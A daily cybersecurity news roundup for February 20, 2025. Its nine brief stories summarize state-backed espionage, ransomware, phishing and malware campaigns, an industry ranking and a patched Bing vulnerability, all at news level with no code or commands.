Cybersecurity News for Feb 20, 2025

Story 1: Russian Groups Target Signal Messenger in Espionage Campaign

Russian-affiliated threat groups, including UNC5792 and UNC4221, are actively targeting users of the Signal messaging app, particularly those involved in sensitive military and governmental communications related to Ukraine. These attackers employ phishing techniques, such as sending malicious QR codes that, when scanned, link the victim’s Signal account to a device controlled by the attackers, enabling real-time message interception. Google’s Threat Intelligence Group has observed this activity and anticipates that such tactics may become more widespread, potentially affecting users beyond the current conflict zone.

Story 2: Russian CryptoBytes Hackers Exploiting Windows Machines

The Russian cybercriminal group known as CryptoBytes has intensified its ransomware campaigns by deploying a modified version of the UxCryptor malware. Targeting Windows systems globally, these attacks utilize advanced anti-analysis techniques to evade detection and employ psychological pressure tactics to coerce victims into paying cryptocurrency ransoms. Researchers have observed that the group leverages leaked ransomware builders, lowering the barrier for entry and suggesting a potential franchise-style operation.

Story 3: Phishing Remains the Preferred Technique Among Threat Actors

A recent report from Darktrace highlights that phishing continues to be the most favored method among cybercriminals, with over 30.4 million phishing emails detected between December 2023 and December 2024. Notably, 70% of these emails bypassed DMARC authentication, and 55% evaded existing security measures before detection. The report also notes a rise in sophisticated tactics, including AI-generated content and the exploitation of trusted third-party services to enhance the credibility of phishing attempts.

Story 4: North Korean Hackers Using Dropbox and PowerShell Scripts

The North Korean state-sponsored group Kimsuky (APT43) has been conducting cyber espionage campaigns targeting South Korean entities and cryptocurrency users. These attacks involve phishing emails containing malicious LNK files that execute obfuscated PowerShell scripts, utilizing Dropbox’s API for payload delivery and data exfiltration. This strategy allows the attackers to bypass traditional security defenses by leveraging trusted cloud services and living-off-the-land techniques.

Story 5: Microsoft Recognized as Leader in Cyber-Physical Systems Protection

Microsoft has been named a Leader in the 2025 Gartner Magic Quadrant for Cyber-Physical Systems Protection Platforms. This recognition underscores Microsoft’s commitment to providing comprehensive security solutions that bridge the gap between IT and operational technology environments. Their approach emphasizes the integration of advanced threat protection, unified security management, and robust compliance features to safeguard critical infrastructure and cyber-physical systems.

Story 6: Fake Browser Updates Deploy NetSupport RAT and StealC Malware

A sophisticated malware campaign attributed to the threat actor SmartApeSG has been distributing NetSupport RAT and StealC malware through fake browser update notifications. Unsuspecting users are lured into downloading malicious payloads from compromised websites, leading to remote access tool deployment and credential theft. The attackers employ advanced evasion techniques, including DLL side-loading, to maintain persistence and avoid detection.

Story 7: Phishing Attack Hides JavaScript Using Invisible Unicode Trick

Cybercriminals have developed a new obfuscation method that utilizes invisible Unicode characters to conceal malicious JavaScript code within phishing emails. This technique involves replacing binary values with non-visible Unicode characters, rendering the malicious payload virtually undetectable in the email’s source code. Such sophisticated obfuscation poses significant challenges for traditional security filters and underscores the need for advanced threat detection mechanisms.

Story 8: Ghost Ransomware Breaches Organizations in 70 Countries

The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI have issued a joint advisory regarding the Ghost ransomware, which has compromised organizations across more than 70 countries. The attackers exploit outdated software and firmware in internet-facing services, affecting various sectors, including healthcare, government, education, and manufacturing. The advisory emphasizes the importance of maintaining up-to-date systems and implementing robust security measures to mitigate such threats.

Story 9: Critical Microsoft Bing Vulnerability Allows Remote Code Execution

Microsoft has addressed a critical security flaw in its Bing search engine, identified as CVE-2025-21355, which could have permitted unauthorized remote code execution. The vulnerability stemmed from inadequate authentication mechanisms in a critical Bing service component, potentially allowing attackers to compromise backend systems and manipulate search results. Microsoft has fully mitigated the issue on its servers, and users are advised to remain vigilant and ensure their systems are updated.

CyberNews 2-20-25